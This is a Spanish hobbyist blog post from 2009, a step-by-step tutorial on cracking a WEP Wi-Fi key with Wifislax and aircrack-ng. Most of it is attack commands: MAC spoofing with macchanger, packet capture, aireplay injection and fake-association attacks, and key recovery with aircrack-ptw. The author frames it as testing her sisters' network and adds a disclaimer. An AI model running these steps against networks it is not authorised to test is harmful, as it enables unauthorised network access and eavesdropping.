Después de dias y dias desaparecida en combate aqui vengo con mi último aprendizaje.Han sido muchos dias de leer,probar y desesperar,pero al final hoy lo he conseguido.

He estado bregando con el Backtrack,con el aircrack sobre Intrepid Ibex y finalmente  me decidí a descargar el Wifislax..aisss si lo hubiera hecho antes..jaja..

Bueno,,como sabeis,todos estan destinados a la auditoria de redes,para entendernos,,yo de esos temas no sabia nada,,solo queria averiguar como se saca una contraseña wep,creo que es algo que a todos los que nos gusta la informatica alguna vez nos pica el gusanillo de probar.

Como os decia ayer empecé a probar con Wifislax 3.1 usandolo como live cd,aunque tambien se puede instalar.

Lo descargué con “este” torrent,pero podeis hacerlo desde Seguridad Wireless,eso sí,no podreis hacerlo con Firefox,tendréis que hacerlo con otro navegador.

Lo primero de todo aclarar que las explicaciones que voy a dar son para la tarjeta Intel PRO Wireless 3945, el chipset iwl3945 y para poder ponerlo en modo monitor hay que cambiarlo a ipwraw.Al principio lo hacia en consola,con un simple:

rmmod iwl3945

modprobe ipwraw

Pero en Wifislax es aún mas facil,enseguida os explico los pasos.

Lo primero es descargar la iso y quemarla a un cd.

Configuramos la bios para iniciar desde cd.

Damos enter en la primera pantalla y despues en la siguiente elegimos la primera opcion y luego toca esperar.Cuando llega a “Activando deteccion de hardware” tarda un poco,pero paciencia..todo llega.jeje.

Cuando te pide usuario pones root.

La contraseña es toor.

y justo a continuacion escribimos startx,y asi empezará a cargar el entorno grafico.

Cuando ya estas en el escritorio sigues esta ruta:<

-Inicio/Wifislax/Drivers/Intel pro wireless y eliges la opcion del centro “Inyectar con ipwraw”Se abre una ventana,deja que se cargue el script y la cierras.


Como yo queria justamente sacar la contraseña que acababa de poner a la conexion del ciber de mis hermanas,pues falseé la Mac.(llamaremos CIBER a la conexion de la que quiero sacar la clave)

-Abrír consola de linux y teclear:

airmon-ng stop wifi0

ifconfig wifi0 down

macchanger --mac 00:11:22:33:44:55 wifi0(ahora esa será nuestra Mac)

airmon-ng start wifi0


(Para saber los datos que te harán falta puedes hacer un airodump-ng wifi0,y te anotas el canal,el Essid y Bssid de la conexion a la que quieres acceder.Cierra la ventana despues)

-Ahora abres una consola de shell(no se que diferencia hay pero yo lo he hecho asi)

Tecleas:

ifconfig wifi0 up

iwconfig wifi0 rate 1M

Ahora vamos a empezar a capturar,asi que ahi mismo tecleamos:

airodump-ng -w(un nombre que quieras) --channel(canal CIBER) wifi0

Edito

Recuerda que con el airodump puedes filtrar tambien además de por canal por bssid

airodump-ng -w P --bssid BSSID -c CANAL INTERFAZ

airodump-ng -w P -b BSSID --channel CANAL INTERFAZ

Cualquiera de las 2 sirve … y lo que haces es que además de fijar el canal… únicamente mire la BSSID que le has indicado)



-Abrimos una nueva Shell para empezar a inyectar:(a esto se le llama ataque 3)
aireplay -3 -b(MacCiber) -h(MacNuestra) wifi0


Vemos como empiezan a correr paquetes:
Lanzamos un ataque 1,para asociarnos.Recomiendo hacer todo sin prisa por que solo conseguireis que se os pete el ordenador.
aireplay -1 0 -a(MacCiber) -e(nombre de la red,osea el Essid) -h(MacNuestra) wifi0
Ahora os tendria que aparecer esta imagen:(no obstante,si veis que no tira,cerrad y volved a poner la linea de nuevo)


Se supone que el airodump que teneis abierto ya tiene que empezar a dar DATA(si,,eso es lo que mas teneis que mirar por que es lo que importa)Yo me puse a comer cuando iba por unos 30 y cuando volví al ordenador fijaos que andaba por 612718(vamos,,que me quedé muerta,jajaja).Si os fijais arriba en la imagen habian pasado 46 minutos.

Ahora vamos a desencriptar,pero no os precipiteis,,es mejor esperar a tener muchas datas,habrá gente que lo consiga con poco,pero si te corren bien las datas dejalo correr hasta mas o menos lo que me dió a mi,por que fué lanzar el aircrack y salir la contraseña,osea,que tenia bastante informacion.
-Abrimos una shell y tecleamos:
aircrack-ptw (nombre del archivo que pusiste -01.cap)
(si te fijas en la imagen yo puse simplemente f como nombre del archivo,pero el que genera es con -01.cap)


Como veis me salió rapido y la comprobé y funcionó perfectamente,(sinceramente me gusta mas dejarla sin contraseña,jeje)De esa cifra que veis realmente la contraseña es a partir del 13:
Hay mil cosas que pasan,fallos,comandos que tecleas mal y otra vez a escribir,,como bien me dijo mi amiga Alejandra(Nopalitux)….las madres quieren más a los hijos con los que mas sufrieron en el parto,jeje.
Tengo que agradecer a mucha gente su ayuda,tanto directa como por sus tutoriales,que me he mascao en estas casi dos semanas.
Mi agradecimiento a Buccio, Alberch,Casidiablo,Nopalitux,ChimoC y mi amigo Javi.
Cualquier fallo o duda por favor no os corteis,me lo dejais en los comentarios.
Cada uno se hace responsable del uso que dé a la información que doy en este post.
Y consejo absoluto,,paciencia,paciencia..y sobre todo leed,aprended,probad más cosas si algo falla.

Pueden interesarte los siguientes articulos:

-Usb Belkin en Wifislax

Usb Zydas WLA-54L funciona en Wifislax.

-Airoscript en Wifislax (¿Tan frágil es mi contraseña?)

Comparte y disfruta:
  • Print
  • Digg
  • StumbleUpon
  • del.icio.us
  • Facebook
  • Yahoo! Buzz
  • Twitter
  • Google Bookmarks
  • Bitacoras.com
  • FriendFeed
  • Identi.ca
  • Suggest to Techmeme via Twitter
  • Wikio

Comments (164) »

Esta entrada fue creada en Domingo, febrero 15th, 2009 @ 8:45Sobre: how to, informatica, linux. Si quieres seguir las respuestas puedes suscribirte al RSS 2.0 feed. Tu puedes dejar un comentario, o trackback desde tu sitio.